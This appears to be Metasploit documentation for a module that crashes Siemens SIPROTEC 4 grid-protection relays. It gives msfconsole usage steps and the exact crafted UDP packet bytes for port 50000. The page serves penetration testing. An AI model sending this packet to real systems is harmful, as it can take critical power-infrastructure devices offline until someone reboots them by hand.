Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/auxiliary/dos/siemens_siprotec4.md
Views: 11784
Description
This module sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) device. A manual reboot is required to return the device to service.
Vulnerable Application
Since this exploit hits the embedded software of a SCADA component, there is no vulnerable application for download on the web. You may check the vendor's website for additional information. (http://w3.siemens.com/smartgrid/global/en/products-systems-solutions/downloads/Pages/SIPROTEC-4-Downloads.aspx) You may also check the demo video: (https://drive.google.com/open?id=176ZC7nLJyJHGHPB3LbRxvLgArE9kOjPz)
Verification Steps
Start
msfconsole
use auxiliary/dos/scada/siemens_siprotec4
Set
RHOST <TARGET>
, replacing<TARGET>
with the IP address you wish to attack.run
Verify that you see
[*] Sending DoS packet ...
Verify that you see
[*] Auxiliary module execution completed
Verify that the exploit sends a specially crafted packet which contains
11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E
Document: (https://github.com/can/CVE-2015-5374-DoS-PoC/blob/master/README.md) Metasploit Module is written based on this exploit: (https://www.exploit-db.com/exploits/44103/)
Options
set RHOST <TARGET_IP>
, set RPORT <TARGET_PORT> (Default 50000)
.